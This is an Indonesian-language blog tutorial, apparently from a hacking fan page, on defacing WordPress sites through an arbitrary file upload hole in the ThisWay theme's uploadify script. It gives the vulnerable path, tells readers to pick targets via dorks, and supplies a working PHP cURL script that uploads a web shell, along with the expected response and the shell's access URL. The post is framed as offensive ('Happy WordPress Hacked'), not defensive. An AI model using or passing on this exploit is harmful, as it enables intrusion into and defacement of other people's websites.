Tutorial Deface dengan WordPress ThisWay Arbitrary File Upload

Hallo Fans ,Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi
lg sibuk urus masadepan *asiikk wkwkwk
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Wordpress

kali ini Nue akan share Exploit Tutorial deface dengan WordPress ThisWay Arbitrary File Upload,  etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk

hahaha iseng2 aja share kali aja masih crotz

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface

- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 

Langsung intip Tutorialnya

#- Title: WordPress ThisWay Arbitrary File Upload

#- Author: Bet0

#- Date: 11/01/2013  

#- Vendor: themeforest.net

#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/

#- Tested on : Windows 7

=============

Pertama Dork Pikir sendiri Mz :v xixihi

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3. Vuln = {"status":"NOK","ERR":"This file is incorect"} atau Blank
*kurang lebih sih gituh wkwkwk *maaf kalo salah hehehe

4. Buat File Baru Berekstensi .php Contoh thisway.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn thisway.php tadi

<?php
$uploadfile="namashellente.php";
$ch = curl_init("target.crotz/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD (berupa random shell.php gitu deh) dan akan keluar lengkap link akses shell ente
{"status":"OK","imageID":12,"imageName":"settingimage_namarandomshellentenanti.php"}

8. Shell Akses: www.target.crotz/wp-content/uploads/thn/bln/settingsimage_randomnamashellente.php

done

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 3XPLOI7 Bug




./Nuenomaru

Visit and follow :

FP         : TKJ Cyber Art

G+         : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM      : C0018D1A2